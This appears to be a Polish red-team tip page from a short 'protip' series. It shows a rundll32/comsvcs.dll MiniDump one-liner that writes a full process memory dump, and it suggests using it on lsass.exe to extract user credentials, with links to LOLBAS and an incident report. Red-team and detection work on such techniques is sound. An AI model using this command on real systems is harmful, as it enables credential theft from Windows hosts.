alphasec
Windows protip 002c
in 𝕏

rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 555 555.dmp full - zapisz zrzut pamięci procesu o ID 555

tty1 · windows
> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 555 555.dmp full
#Windows#RedTeam

Biblioteka DLL c:\windows\system32\comsvcs.dll posiada ciekawą funkcję MiniDump, która jest jednym ze sposobów na stworzenie minidumpa procesu. Nie trudno wymyślić, że niegłupim pomysłem byłoby zrobienie zrzuci pamięci procesu lsass.exe w celu wyciągnięcia credentiali użytkowników, co nawet miało niedawno miejsce.

rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 555 555.dmp full - zapisz zrzut pamięci procesu o ID 555

Przydatne linki

https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/ comsvcs.dll w projekcie LOLBAS web ↗ https://community.rsa.com/community/products/netwitness/blog/2020/03/24/exchange-exploit-case-study-cve-2020-0688 ciekawy raport RSA, w którym napastnicy wykorzystali omawiany DLL web ↗
← poprzedni protip 002b ••• Wszystkie protipy następny → protip 002d
// subskrybuj

Nowe protipy prosto na maila.

Mięsiste jednolinijkowce i triki z prawdziwych zleceń. Zero spamu, zero teorii. Wypisujesz się jednym kliknięciem.

wersja newslettera: